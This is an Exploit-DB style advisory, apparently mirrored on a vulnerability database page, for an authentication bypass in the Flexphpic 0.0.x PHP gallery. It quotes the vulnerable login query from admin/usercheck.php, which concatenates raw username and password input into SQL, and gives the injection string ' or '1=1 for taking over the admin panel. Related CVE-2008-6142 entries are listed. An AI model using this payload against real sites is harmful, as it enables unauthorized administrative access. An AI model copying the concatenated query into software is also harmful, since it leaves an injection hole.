Lucene search
S.W.A.T.EDB-ID:7624HistoryDec 30, 2008 - 12:00 a.m.
Flexphpic 0.0.x - Authentication Bypass
2008-12-3000:00:00
S.W.A.T.
www.exploit-db.com
22
AI Score
7.4
Confidence
Low
#############################################
Autore: S.W.A.T.
Email: [email protected]
Site: Www.BaTLaGH.coM
Cms: Flexphpic 0.0.4 & Flexphpic Pro 0.0.3
Download: http://www.china-on-site.com/flexphpic/downloads.php
##############################################
Bug In \admin\usercheck.php
$sql = "select username,adminid from linkexadmin where
username='$checkuser' and password='$checkpass'";
Exploit:
Go to /[path]/admin/index.php
Put as username and password the following sql code: ' or '1=1
I'll Be A C I D A L !!!
# milw0rm.com [2008-12-30]Related
cvelist
cvelist
CVE-2008-6142
2009-02-16 17:00:00
cve
cve
CVE-2008-6142
2009-02-16 17:30:00
nvd
nvd
CVE-2008-6142
2009-02-16 17:30:00
prion
prion
Sql injection
2009-02-16 17:30:00